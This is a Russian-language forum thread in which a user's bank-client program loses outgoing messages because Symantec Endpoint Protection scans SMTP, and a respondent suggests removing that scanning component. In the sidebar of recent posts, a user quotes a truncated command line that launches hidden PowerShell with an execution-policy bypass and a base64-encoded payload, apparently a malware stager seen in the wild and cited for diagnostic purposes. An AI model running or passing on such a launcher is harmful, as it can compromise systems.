Перейти к содержанию
Владимир Горицкий

Symantec Endpoint Protection 11.0.6005.652 и Клиент-Банк

Recommended Posts

Владимир Горицкий

У меня такая проблема:

Windows XP pro SP3

Установлен Symantec Endpoint Protection 11.0.6005.652 (Клиент)

Установлен Клиент-банк

Обращение к банку идёт через Dual-Up модем

Банковская программа формирует документы в формате *.eml и отправляет их поочерёдно

При приёме всё нормально, но при передаче в банк сообщений - они теряются (частично). У меня стоит отметка что "отправлено", а банк их не получает.

Выскакивает такое сообщение (см. в прикреплённом файле).

На сколько я понимаю, то происходит следующее:

Symantec при передаче их начинает проверять, чем вызывает некую паузу в потоке отправки, а на той стороне при паузе передаче успевает сработать разрыв соединения. Вот и получается, что часть сообщений проходить успевает, а часть нет.

Всё конечно проходит если выключить автоматическую защиту почты в интернете, но ведь это не есть хорошо.

Я прописал в глобальных исключениях и каталоги и *.eml, но всё это не помогает. Symantec шифрует отправку и передачу, но (как я вычитал в справке) если шифрование выключить, то он автоматом блокирует сообщения.

Как разрулить эту ситуацию.

Заранее благодарен

111.jpg

post-14592-1317015620_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Shell

проверку smtp уберите с этих клиентов. Старая песня..

Можно все такие БК выделить в группу в SEP и убрать проверку smtp. Желательно убиранием компонента на клиенте, а не только политикой.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Владимир Горицкий
проверку smtp уберите с этих клиентов. Старая песня..

Можно все такие БК выделить в группу в SEP и убрать проверку smtp. Желательно убиранием компонента на клиенте, а не только политикой.

Я так понимаю в правилах брэндмаура прописать по TCP/SMTP(25) в обоих направлениях, а в приложениях добавить все БК

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Shell
Я так понимаю в правилах брэндмаура прописать по TCP/SMTP(25) в обоих направлениях, а в приложениях добавить все БК

такое правило не всегда помогает. В случае описанном вами проблема не в файерволле а в smtp компоненте (по опыту).

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Владимир Горицкий

Спасибо, после 24.07 попробую, щас в отъезде....

Пардон после 24.10....

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×